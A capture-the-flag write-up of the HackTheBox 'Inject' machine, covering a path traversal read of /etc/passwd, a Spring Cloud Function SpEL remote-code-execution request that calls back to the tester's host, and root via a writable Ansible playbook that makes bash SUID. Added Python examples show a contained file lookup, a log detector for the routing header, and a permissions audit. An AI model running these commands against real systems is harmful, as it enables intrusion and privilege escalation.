HackTheBox - Inject
NMAP
Nmap scan report for 10.10.11.204
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scanning the machine, we find two open ports, of which port 8080 is interesting to us as there is a web server running on it.
PORT 8080
There are options to log in and sign up, but login doesn't take you anywhere, so we visit the signup page.
There is, however, an option to upload files on the home page.
On trying to upload a normal txt file, it only tells us that image files can be uploaded.
Foothold
I got exhausted trying to upload php files, but it didn't work and was a huge rabbit hole for me. What matters is noticing how the uploaded files are fetched:
it uses a GET parameter to fetch the file. Trying for LFI didn't show any results in the browser, but if we send the request with curl
it shows that the endpoint is indeed vulnerable to path traversal:
curl 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd'
We can also list the files in the web root directory by traversing up to that path:
curl 'http://10.10.11.204:8080/show_image?img=../../../'
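The root cause of the two requests above is that the img parameter is joined onto the upload directory and read as-is. The following is an added example, not code from the Inject application: it shows that unsafe lookup beside a contained one that canonicalises the path and refuses anything outside the root (or any directory, which closes the listing trick too). The web root and files are constructed in a temp directory.

```python
"""Path traversal in a file-serving endpoint: the unsafe lookup beside a
contained one. Added example, not code from the Inject application; the web
root and files are constructed in a temp directory for illustration."""
from pathlib import Path
from typing import Optional
import tempfile


def resolve_unsafe(web_root: Path, img: str) -> Path:
    # The pattern the endpoint above suffers from: the user-supplied
    # parameter is joined onto the upload root and opened as-is, so
    # "../" segments climb out of that directory.
    return web_root / img


def resolve_contained(web_root: Path, img: str) -> Optional[Path]:
    # Hardened form: canonicalise both paths (collapsing ".." and symlinks)
    # and refuse anything whose real location is outside the root. Also
    # refuse directories, so the endpoint cannot be turned into a listing.
    root = web_root.resolve()
    candidate = (root / img).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    if not candidate.is_file():
        return None
    return candidate


def demo() -> dict:
    # Constructed layout: a legitimate image inside "uploads" and a file
    # one level above it that must never be reachable through the endpoint.
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        root = base / "uploads"
        root.mkdir()
        (root / "cat.png").write_bytes(b"\x89PNG")
        (base / "secret.txt").write_text("outside the web root")
        traversal = "../secret.txt"
        return {
            "unsafe_reads_outside": resolve_unsafe(root, traversal).read_text(),
            "contained_rejects_traversal": resolve_contained(root, traversal) is None,
            "contained_rejects_etc_passwd": resolve_contained(
                root, "../../../../../../etc/passwd") is None,
            "contained_rejects_listing": resolve_contained(root, "../") is None,
            "contained_serves_legit": resolve_contained(root, "cat.png") is not None,
        }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

The containment check works on resolved paths rather than on the raw string, so encoded or redundant "../" variants and symlinks inside the upload directory are judged by where they actually land.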
We can read the pom.xml file, which gives information about the project.
Here we find Spring Cloud version 3.2.2 being used. Searching for vulnerabilities, Spring Cloud Function is vulnerable to remote code execution through the spring.cloud.function.routing-expression header, which accepts SpEL (Spring Expression Language) and can be abused to execute system commands on the machine:
curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl 10.10.14.21")' --data-raw 'data'
To get a reverse shell, we can put our payload in a shell script, upload it and execute it on the server.
We then stabilize the shell with python.
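From the defender's side, the request above is very visible: the routing-expression header is rarely used, and a legitimate routing expression selects a function by name or header value rather than reaching for Java classes. The following is an added detection example, not anything from the Inject box: it scans request records for that header and grades them, treating a T(...) type reference or Runtime/exec usage as high confidence. The JSON-lines log format and every entry in SAMPLE_LOG are constructed.

```python
"""Flag requests whose SpEL routing-expression header carries type references
or process execution, as a reviewer of proxy logs in front of a Spring Cloud
Function app would. Added detection example, not from the Inject box; the
JSON-lines format and the entries in SAMPLE_LOG are constructed."""
import json
import re
from typing import List, Optional

ROUTING_HEADER = "spring.cloud.function.routing-expression"
# Legitimate routing expressions select a function by name or header value.
# Type references (T(...)), Runtime/ProcessBuilder and .exec() calls do not
# belong there and indicate an attempt to run code through the expression.
# Case-sensitive on purpose: a lower-case "t(" inside e.g. split( is benign.
SUSPICIOUS = re.compile(r"\bT\s*\(|\bRuntime\b|ProcessBuilder|\.exec\s*\(")

SAMPLE_LOG = """\
{"ts":"2023-03-12T10:01:02Z","src":"10.10.14.21","method":"POST","path":"/functionRouter","headers":{"content-type":"text/plain"}}
{"ts":"2023-03-12T10:01:09Z","src":"10.10.14.21","method":"POST","path":"/functionRouter","headers":{"spring.cloud.function.routing-expression":"headers['fn']"}}
{"ts":"2023-03-12T10:01:15Z","src":"10.10.14.21","method":"POST","path":"/functionRouter","headers":{"Spring.Cloud.Function.Routing-Expression":"T(java.lang.Runtime).getRuntime().exec(\\"curl 10.10.14.21\\")"}}
{"ts":"2023-03-12T10:02:00Z","src":"10.10.14.22","method":"GET","path":"/show_image?img=cat.png","headers":{}}
"""


def routing_expression(entry: dict) -> Optional[str]:
    # HTTP header names are case-insensitive, so normalise before lookup;
    # the third sample line uses mixed case to exercise this.
    headers = {k.lower(): v for k, v in entry.get("headers", {}).items()}
    return headers.get(ROUTING_HEADER)


def severity_of(expression: str) -> str:
    # Presence of the header alone is worth a look (medium); SpEL that
    # reaches for classes or process execution is a high-confidence hit.
    return "high" if SUSPICIOUS.search(expression) else "medium"


def scan(log_text: str) -> List[dict]:
    findings: List[dict] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        expression = routing_expression(entry)
        if expression is None:
            continue
        findings.append({
            "ts": entry["ts"],
            "src": entry["src"],
            "path": entry["path"],
            "severity": severity_of(expression),
            "expression": expression,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"[{finding['severity']}] {finding['ts']} {finding['src']} "
              f"{finding['path']} :: {finding['expression']}")
```

Alongside detection, the fix for the application is to upgrade Spring Cloud Function past the affected 3.2.2 release; the log rule is there for the window before the patch lands and to spot scanning against it.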
Privilege Escalation (Phil)
We can escalate to the phil user by getting his password from the settings.xml file in the .m2 directory.
Checking which groups this user is in.
With find we can look for files or folders that this group has access to.
Running pspy, we can see ansible-playbook being run as the root user and executing the YAML file.
Privilege Escalation (root)
We can escalate our privileges to root by using the shell module in an Ansible YAML file placed in /opt/automation/tasks, which executes commands as the root user:
echo "[{hosts: localhost, tasks: [shell: 'chmod +s /bin/bash']}]" > playbook_2.yml
With chmod +s /bin/bash we make bash a SUID binary, meaning it runs as root when started with -p.
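The whole root escalation rests on one misconfiguration: a directory of playbooks that root runs is writable by a non-root group. The following is an added example, not code from the box, of the check a hardening script would run against such a directory: it flags anything in the tasks directory, or the directory itself, that is not owned by the expected user or is group/world-writable. The layout is constructed in a temp location and the expected owner is the current user so it runs unprivileged; on a real host you would pass uid 0 and the real path, such as the /opt/automation/tasks seen above.

```python
"""Audit a directory of playbooks that a root automation job runs: if anyone
other than root can write there, the job runs their tasks as root. Added
example, not from the Inject box; the directory layout is constructed in a
temp location and the expected owner is the current user so it runs
unprivileged (on a real host pass uid 0 and the real path)."""
import os
import stat
import tempfile
from pathlib import Path
from typing import List


def audit_tasks_dir(tasks_dir: Path, expected_uid: int) -> List[str]:
    findings: List[str] = []

    def check(path: Path) -> None:
        st = path.stat()
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid != expected_uid:
            findings.append(
                f"{path.name}: owned by uid {st.st_uid}, expected {expected_uid}")
        # A writable directory is enough on its own: a new playbook can be
        # dropped in or an existing one replaced, however tight the files are.
        if mode & stat.S_IWOTH:
            findings.append(f"{path.name}: world-writable ({oct(mode)})")
        elif mode & stat.S_IWGRP:
            findings.append(f"{path.name}: group-writable ({oct(mode)})")

    check(tasks_dir)
    for child in sorted(tasks_dir.iterdir()):
        check(child)
    return findings


def demo() -> List[str]:
    # Constructed layout mirroring the weakness above: the tasks directory
    # is group-writable, and one playbook is additionally world-writable.
    with tempfile.TemporaryDirectory() as tmp:
        tasks = Path(tmp) / "tasks"
        tasks.mkdir()
        (tasks / "ok.yml").write_text("- hosts: localhost\n  tasks: []\n")
        (tasks / "loose.yml").write_text("- hosts: localhost\n  tasks: []\n")
        (tasks / "ok.yml").chmod(0o644)
        (tasks / "loose.yml").chmod(0o666)
        tasks.chmod(0o775)
        return audit_tasks_dir(tasks, os.getuid())


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Ownership is checked as well as mode bits because a directory owned by a non-root user is writable by that user regardless of the group and other bits, which the mode check alone would miss.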